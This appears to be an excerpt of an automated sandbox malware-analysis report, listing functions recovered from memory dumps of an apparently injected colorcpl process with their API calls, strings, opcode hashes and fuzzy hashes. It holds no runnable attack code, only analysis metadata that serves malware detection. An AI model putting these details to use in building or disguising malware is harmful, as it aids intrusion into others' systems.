Opcode ID: df94eeca3eccf8ff41c330c967101f317c16e31e5c80494a305bad87114a8940
Instruction ID: fb5c4165217eae8222c016616f84971bf697bc3ceb92b6d84fc6793b083e825d
Opcode Fuzzy Hash: df94eeca3eccf8ff41c330c967101f317c16e31e5c80494a305bad87114a8940
Instruction Fuzzy Hash: EEF0ED3338420036E33072A9AC02FC7B38CCFC5B61F204426F60CEB1C0D992B4018AE4

Function 029B9FBA Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 029BA005

Memory Dump Source

Source File: 00000006.00000002.3628491294.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_29b0000_colorcpl.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: f5858c0c55104e4a058bc38f635ef7b4d8b90780a9dc1bf7bec0591c7f046e2b
Instruction ID: 3e2267e648b3f78047bcb3e13d8e4a7d262f4a005c1760858d72dfc0fcb08f56
Opcode Fuzzy Hash: f5858c0c55104e4a058bc38f635ef7b4d8b90780a9dc1bf7bec0591c7f046e2b
Instruction Fuzzy Hash: 94F0397225420036E72176A99C42FD7779D9F95B90F244419FA08AB184D9A6B8018AA9

Function 029D9830 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,4835D64D,00000007,00000000,00000004,00000000,029C3D84,000000F4), ref: 029D986F

Memory Dump Source

Source File: 00000006.00000002.3628491294.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_29b0000_colorcpl.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 94b40011a0e07b04a460fb85af21bc0ba6a9328e507c21814fea76e6886eea4a
Instruction ID: 4171a7df06be21544195ea62de5793759231d8cb7627ba572723b2d410356033
Opcode Fuzzy Hash: 94b40011a0e07b04a460fb85af21bc0ba6a9328e507c21814fea76e6886eea4a
Instruction Fuzzy Hash: DAE0E5B66102087BDA14EE59DC51FDB77AEEFC9720F408419F908A7241D670B9118BB9

Function 029D97E0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000104,?,029D17CC,?,?,029D17CC,?,00000104,?,0000F71F), ref: 029D981C

Memory Dump Source

Source File: 00000006.00000002.3628491294.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_29b0000_colorcpl.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1b3bf7aaabc3abd77079e067ca5665540d511f7f4f2f3ad1481f7685c8ca6f67
Instruction ID: 1a6230a4f7a3709c2e6027cfca8b24f835c5b769b49356c7e20c64b60ff7fa85
Opcode Fuzzy Hash: 1b3bf7aaabc3abd77079e067ca5665540d511f7f4f2f3ad1481f7685c8ca6f67
Instruction Fuzzy Hash: 8FE012756542097FD614EE59DC41FDB77AEDFC9710F008419F90CA7241D670B9118BB8

Function 029C8310 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 029C833C

Memory Dump Source

Source File: 00000006.00000002.3628491294.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_29b0000_colorcpl.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 0e28f0a4ff7bbc9ba7fe8ffbbbd505976d865a31758c1e9951dd0ced538b89b9
Instruction ID: 023d481dc0b0ce485bafa7fdf81645da0333b9b6f4938e7f188c950a0194dad9
Opcode Fuzzy Hash: 0e28f0a4ff7bbc9ba7fe8ffbbbd505976d865a31758c1e9951dd0ced538b89b9
Instruction Fuzzy Hash: 0BE0867225030427EF246AB8EC45F66375CAB88738F68CA64B95CDB2C1EA78F5518261

Function 029C8100 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,029C1CA0,029D7FAF,029D566F,029C1C63), ref: 029C8133

Memory Dump Source

Source File: 00000006.00000002.3628491294.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_29b0000_colorcpl.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 7d6f93b59525a5a0ca184e9aada40921544c51c931d56c1db768891d936132a7
Instruction ID: aa496e09267515199a9cde025d1cc611e02ce1755a60f0c17d63be561857b5d0
Opcode Fuzzy Hash: 7d6f93b59525a5a0ca184e9aada40921544c51c931d56c1db768891d936132a7
Instruction Fuzzy Hash: 81D05EB62403053BE614BAF49C06F96368E5B44794F148874B90CD72C2EE65E12047A6

Function 029C0D7B Relevance: 1.5, APIs: 1, Instructions: 21threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111), ref: 029C0D87

Memory Dump Source

Source File: 00000006.00000002.3628491294.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_29b0000_colorcpl.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
Instruction ID: bf1bc1710778120c5dad1e1e4edb488840c914ac3c5f8ef1823c60554c6106ca
Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
Instruction Fuzzy Hash: FAD0A76774010C75A60155846CC1DFEB71CDB846A5F004067FB08D1040D621590206B1

Function 04BD2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04BD2C24

Memory Dump Source

Source File: 00000006.00000002.3630083758.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true

Associated: 00000006.00000002.3630083758.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b60000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 96ca0a715875c983adf7b3b7ba83d4614da6bb79349dbfa050ecb5fc2cd0414a
Instruction ID: 2a677419ddc8b52210f05f62f785dcee1e4ccfc2f2ce27213d7538903df515f8
Opcode Fuzzy Hash: 96ca0a715875c983adf7b3b7ba83d4614da6bb79349dbfa050ecb5fc2cd0414a
Instruction Fuzzy Hash: 3FB09B729019C5C5FB15F76046087177900EBD0705F19C0E1D2030742E473CD5D1F275

Non-executed Functions

Function 049B04E0 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3629981088.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49b0000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8c77cca3f04dcfdcd3291bbe23e2177c0e2715078b3328f578d09829eb2a101
Instruction ID: 337f7d916ca30ee9fddc12e16133142591572915bdae118e69c92b5f659945c7
Opcode Fuzzy Hash: d8c77cca3f04dcfdcd3291bbe23e2177c0e2715078b3328f578d09829eb2a101
Instruction Fuzzy Hash: BC41F57061CB0D4FD368AF6990816BBB3E6FB89304F50463DD9CBC3652EA70F8468685

Function 049BE03E Relevance: 57.7, Strings: 46, Instructions: 204COMMON

Download Yara Rule

Strings

@@@@, xrefs: 049BE208
<=@@, xrefs: 049BE0B8
@@@@, xrefs: 049BE136
@, xrefs: 049BE0C6
@@@@, xrefs: 049BE144
@@@@, xrefs: 049BE0F7
@@@@, xrefs: 049BE167
@@@@, xrefs: 049BE183
)*+,, xrefs: 049BE11A
?, xrefs: 049BE220
@@@@, xrefs: 049BE1A6
@@@@, xrefs: 049BE12F
@@@@, xrefs: 049BE152
@@@@, xrefs: 049BE1C2
89:;, xrefs: 049BE0B1
%&'(, xrefs: 049BE113
@@@@, xrefs: 049BE160
@@@@, xrefs: 049BE1BB
@@@@, xrefs: 049BE0BF
!"#$, xrefs: 049BE10C
@@@@, xrefs: 049BE13D
123@, xrefs: 049BE128
@@@?, xrefs: 049BE0A3
@@@@, xrefs: 049BE1D0
@@@@, xrefs: 049BE198
4567, xrefs: 049BE0AA
@@@@, xrefs: 049BE191
@@@@, xrefs: 049BE1E5
@@@@, xrefs: 049BE201
@@@@, xrefs: 049BE16E
@@@@, xrefs: 049BE20F
@@@@, xrefs: 049BE14B
@@@@, xrefs: 049BE1C9
@@@@, xrefs: 049BE1FA
@@@@, xrefs: 049BE159
@@@@, xrefs: 049BE1B4
@@@@, xrefs: 049BE18A
@@@@, xrefs: 049BE1DE
@@@@, xrefs: 049BE1F3
@@@@, xrefs: 049BE19F
@@@@, xrefs: 049BE1D7
@@@@, xrefs: 049BE1AD
@@@@, xrefs: 049BE17C
-./0, xrefs: 049BE121
@@@@, xrefs: 049BE1EC
@@@@, xrefs: 049BE175

Memory Dump Source

Source File: 00000006.00000002.3629981088.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49b0000_colorcpl.jbxd

Similarity

API ID:
String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
API String ID: 0-3754132690
Opcode ID: 7920d9089ecf8eb24c42981375692a7538f2f08a45e314365e142149fbf7c5ad
Instruction ID: 47e1d6ebf8a42955b400631a4b4a881dc107e36431d37b1a08cb0557e715fae1
Opcode Fuzzy Hash: 7920d9089ecf8eb24c42981375692a7538f2f08a45e314365e142149fbf7c5ad
Instruction Fuzzy Hash: E9915EF04083948ACB158F55A1612AFFFB5EBC6305F15816DE7E6BB243C3BE89058B85

Function 04BD2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 04BD293C
___swprintf_l.LIBCMT ref: 04BD295E
___swprintf_l.LIBCMT ref: 04BD29A3
___swprintf_l.LIBCMT ref: 04C0A52E

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 04C0A54E
ffff:, xrefs: 04C0A504
::%hs%u.%u.%u.%u, xrefs: 04C0A527
:%u.%u.%u.%u, xrefs: 04C0A5B8

Memory Dump Source

Source File: 00000006.00000002.3630083758.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true

Associated: 00000006.00000002.3630083758.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b60000_colorcpl.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 17022c22d25edf3185e5bbf990b626ffc11cada1a526022205cd4c61c978fdc4
Instruction ID: 636d964d1d49422f2b745b17b102a95622faf81f9a19f53d5bbffc03fca3a9af
Opcode Fuzzy Hash: 17022c22d25edf3185e5bbf990b626ffc11cada1a526022205cd4c61c978fdc4
Instruction Fuzzy Hash: F451F4B6A04256BFDB24DFA8C88097EF7B8FF5820471081F9E455D3645E275FE508BA0

Function 04C42410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 04C424A6
___swprintf_l.LIBCMT ref: 04C424E2
___swprintf_l.LIBCMT ref: 04C4257D
___swprintf_l.LIBCMT ref: 04C425A3
___swprintf_l.LIBCMT ref: 04C425C8
___swprintf_l.LIBCMT ref: 04C42608

Strings

ffff:, xrefs: 04C4247D, 04C4249D
:%u.%u.%u.%u, xrefs: 04C425FF
::%hs%u.%u.%u.%u, xrefs: 04C4249E
::ffff:0:%u.%u.%u.%u, xrefs: 04C424DA

Memory Dump Source

Source File: 00000006.00000002.3630083758.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true

Associated: 00000006.00000002.3630083758.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b60000_colorcpl.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 32f48be4bde5da122528b8f6ee6f6a08798b368e2e3ce8a1e758bb2b39470e14
Instruction ID: 87de1014cf5d70382c45bca69e5da9a8ddf8866a4922d074ff8aa185092ee09b
Opcode Fuzzy Hash: 32f48be4bde5da122528b8f6ee6f6a08798b368e2e3ce8a1e758bb2b39470e14
Instruction Fuzzy Hash: 84510375A00645AFDB30DE9DCA9197FB7FAEF84244B048499F496D3641E6B4FB00CB60

Function 04BC7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04C04655
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04C046FC
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04C04725
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04C04742
ExecuteOptions, xrefs: 04C046A0
Execute=1, xrefs: 04C04713
CLIENT(ntdll): Processing section info %ws..., xrefs: 04C04787

Memory Dump Source

Source File: 00000006.00000002.3630083758.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true

Associated: 00000006.00000002.3630083758.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b60000_colorcpl.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 0c64a6a8cbd2cf87952dc05453b728b6a46c67871c4f24722777b2106ebd52a9
Instruction ID: a00962b534e47bf14bdf1a2f9337bc7ec2f7b58ef91a66ce4d47c0963416acd6
Opcode Fuzzy Hash: 0c64a6a8cbd2cf87952dc05453b728b6a46c67871c4f24722777b2106ebd52a9
Instruction Fuzzy Hash: 3E51D63164021A6BEB14ABA8DC89BAA77A9EB05304F1400EDE505A7290EB70BE459F64

Function 04C66940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3630083758.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true

Associated: 00000006.00000002.3630083758.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b60000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
Instruction ID: bff2ce5f69f72d2f318806ce968b7d384d218ff7223909b9b82670df886c02cd
Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
Instruction Fuzzy Hash: 9F021771609341AFD305CF18C494A6FBBE6EFC8718F048A6DF9868B254DB31E945CB52

Function 04BDB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 04BDB6BF

Strings

+, xrefs: 04BDB65A
0, xrefs: 04BDB695
-, xrefs: 04BDB650
0, xrefs: 04BDB66F

Memory Dump Source

Source File: 00000006.00000002.3630083758.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true

Associated: 00000006.00000002.3630083758.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b60000_colorcpl.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction ID: 8ea8b20c90f8ad04a871fb56670030744011d0849de77c8b79dc5c6628c62395
Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction Fuzzy Hash: 2B819070E092499FDF288E68C8917FEBBA1EF45350F1A45E9D861A7290F735B840CB54

Function 04C420E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 04C4214F
___swprintf_l.LIBCMT ref: 04C42172

Strings

]:%u, xrefs: 04C42169
[, xrefs: 04C4212B
%%%u, xrefs: 04C42146

Memory Dump Source

Source File: 00000006.00000002.3630083758.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true

Associated: 00000006.00000002.3630083758.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b60000_colorcpl.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: e4c53a90daac59a4f1a419f58b50898771fac37071ad950575c6e8fe55aa61c4
Instruction ID: 29021a9f5e6112f0050980cf6461b244928ffcc0668c35790bd6476ade5b03bd
Opcode Fuzzy Hash: e4c53a90daac59a4f1a419f58b50898771fac37071ad950575c6e8fe55aa61c4
Instruction Fuzzy Hash: E721567AA001199BDB10DFB9C941ABEB7F9EF94684F040195F905D3200E731EA01DBA1

Function 04BBF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 04C0031E
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04C002BD
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04C002E7

Memory Dump Source

Source File: 00000006.00000002.3630083758.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true

Associated: 00000006.00000002.3630083758.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b60000_colorcpl.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: e609d1b71b57701b636089566ce1c8ab3f72195b0e6166682baef4f4721debcd
Instruction ID: d8d39e8031efdd2bb1c00b88a28773095198f527b495c84abafe1dac27357efb
Opcode Fuzzy Hash: e609d1b71b57701b636089566ce1c8ab3f72195b0e6166682baef4f4721debcd
Instruction Fuzzy Hash: 05E1AE306047419FD725CF29C884B7AB7E1FB49314F144AADE8A5CB2E1E7B4E945CB82

Function 04BCBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04C07B7F
RTL: Re-Waiting, xrefs: 04C07BAC
RTL: Resource at %p, xrefs: 04C07B8E

Memory Dump Source

Source File: 00000006.00000002.3630083758.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true

Associated: 00000006.00000002.3630083758.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b60000_colorcpl.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: ebaca640b447d576854ba371c226bc085f5c38dac1770ab77a02dc06aeab40c6
Instruction ID: 5d2287009b334b80f932f74c77fdb8f21e102a7f4a530278e0342ebf5bbe88da
Opcode Fuzzy Hash: ebaca640b447d576854ba371c226bc085f5c38dac1770ab77a02dc06aeab40c6
Instruction Fuzzy Hash: 294126317057029FDB24DE25D881B6AB7E6EF88714F000A5DF95ADB780DB30F5059B91

Function 04BCB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04C0728C

Strings

RTL: Re-Waiting, xrefs: 04C072C1
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04C07294
RTL: Resource at %p, xrefs: 04C072A3

Memory Dump Source

Source File: 00000006.00000002.3630083758.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true

Associated: 00000006.00000002.3630083758.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b60000_colorcpl.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 79b064c02c41db376871e5c48a2fc0f0356448c503f3fc83ab7202eb2cc17525
Instruction ID: 11c88b374c05c67a5079e53d5518056ed340b5bb87273e4fd187ea586cf269c0
Opcode Fuzzy Hash: 79b064c02c41db376871e5c48a2fc0f0356448c503f3fc83ab7202eb2cc17525
Instruction Fuzzy Hash: DB410F31709216ABDB24DE25CC82B6AB7A6FB84714F10465CF955EB280EB30F9529BD0

Function 04C42300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 04C4238D
___swprintf_l.LIBCMT ref: 04C423B3

Strings

%%%u, xrefs: 04C42384
]:%u, xrefs: 04C423AA

Memory Dump Source

Source File: 00000006.00000002.3630083758.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true

Associated: 00000006.00000002.3630083758.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b60000_colorcpl.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 2de70beebd084ce779366433401d5e8d104baa0a163fa9930c2f5a91043837c0
Instruction ID: ba2e042a28e7f53a0522f12c1a777764daa441af52eee868f8d73e5e4ec48302
Opcode Fuzzy Hash: 2de70beebd084ce779366433401d5e8d104baa0a163fa9930c2f5a91043837c0
Instruction Fuzzy Hash: E6314372A006199FDB20DF29CD41BAEB7FDEB44754F4445D9E849E3240EB30BA449BA1

Function 04BD7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 04BD7E8B

Strings

+, xrefs: 04BD7DE8
-, xrefs: 04BD7DDD

Memory Dump Source

Source File: 00000006.00000002.3630083758.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true

Associated: 00000006.00000002.3630083758.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b60000_colorcpl.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction ID: 73c811ced668665b9063b238c16017b956f6b88c948527438643f63d9cef9580
Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction Fuzzy Hash: 59919270E002569BDF38DE69C881AFEB7A5EF44720F5449DAE865E72C0FF30A9418760

Function 04B99126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 04B99175
$, xrefs: 04B99191

Memory Dump Source

Source File: 00000006.00000002.3630083758.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true

Associated: 00000006.00000002.3630083758.0000000004C89000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3630083758.0000000004CFE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b60000_colorcpl.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 62854665e8d0aa3c7dce910a1524f9aea91494d20d84b3c192c390956c5b8b76
Instruction ID: b50b94d581e636404f4a98d3b0e3de3166a23488acedf31cc35f2237ee902338
Opcode Fuzzy Hash: 62854665e8d0aa3c7dce910a1524f9aea91494d20d84b3c192c390956c5b8b76
Instruction Fuzzy Hash: 17810DB5D00269ABDB35DF54CC44BEEB7B4AB48714F0041EAAA1DB7240E7716E94CFA0

Function 049B3F92 Relevance: 5.1, Strings: 4, Instructions: 137COMMON

Download Yara Rule

Strings

@, xrefs: 049B406D
@, xrefs: 049B40A6
0, xrefs: 049B4052
@, xrefs: 049B40E7

Memory Dump Source

Source File: 00000006.00000002.3629981088.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_49b0000_colorcpl.jbxd

Similarity

API ID:
String ID: 0$@$@$@
API String ID: 0-692023514
Opcode ID: 698ef94871b2a1f5b0165d884252f4c77144fe505684966acda525dacb1a6d89
Instruction ID: 818e5a99d6cf5673c966fd596b804ca6887cca481dd3ea36d66a6bf5cd8731fd
Opcode Fuzzy Hash: 698ef94871b2a1f5b0165d884252f4c77144fe505684966acda525dacb1a6d89
